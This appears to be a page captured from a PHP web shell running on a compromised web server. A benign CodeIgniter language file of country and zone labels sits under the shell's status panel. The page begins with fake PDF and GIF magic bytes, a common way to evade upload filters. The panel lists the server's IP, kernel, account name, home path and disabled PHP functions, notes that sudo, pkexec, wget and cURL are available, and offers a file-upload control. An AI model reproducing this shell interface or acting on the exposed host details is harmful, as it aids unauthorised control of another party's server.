%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.191 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/public_html/application/language/english/ |
Upload File : |
<?php /****************************************** US English Admin Location Language ******************************************/ $lang['country'] = 'Country'; $lang['countries'] = 'Countries'; $lang['zone_areas'] = 'Zone Area'; $lang['country_zones'] = '%s Zones'; $lang['zone_areas_for'] = 'Zone areas for %s'; $lang['zone_area_form'] = 'Zone area form for %s'; $lang['country_form'] = 'Country Form'; $lang['zone_form'] = 'Zone Form'; $lang['zones'] = 'Zones'; $lang['name'] = 'Name'; $lang['code'] = 'Code'; $lang['iso_code_2'] = 'ISO Code 2'; $lang['iso_code_3'] = 'ISO Code 3'; $lang['address_format'] = 'Address Format'; $lang['require_postcode'] = 'Post Code Required'; $lang['tax'] = 'Tax'; $lang['status'] = 'Status'; $lang['sort_countries'] = 'Countries are sortable! Just drag and drop them in the order you would like for them to appear.'; $lang['add_new_country'] = 'Add New Country'; $lang['add_new_zone'] = 'Add New Zone'; $lang['add_new_zone_area'] = 'Add New Zone Area'; $lang['details'] = 'Details'; $lang['enabled'] = 'Enabled'; $lang['error_country_not_found'] = 'The requested country could not be found.'; $lang['message_saved_country'] = 'The country was saved.'; $lang['message_deleted_country'] = 'The country was deleted.'; $lang['confirm_delete_country'] = 'Are you sure you want to delete this country?'; $lang['no_countries'] = 'There are currently no countries.'; $lang['error_zone_not_found'] = 'The requested zone could not be found.'; $lang['message_saved_zone'] = 'The zone was saved.'; $lang['message_deleted_zone'] = 'The zone was deleted.'; $lang['confirm_delete_zone'] = 'Are you sure you want to delete this zone?'; $lang['no_zones'] = 'There are currently no zones.'; $lang['error_zone_area_not_found'] = 'The requested zone area could not be found.'; $lang['message_saved_zone_area'] = 'The zone area was saved.'; $lang['message_deleted_zone_area'] = 'The zone area was deleted.'; $lang['confirm_delete_zone_area'] = 'Are you sure you want to delete this zone area?'; $lang['no_zone_areas'] = 'There are currently no zone areas.';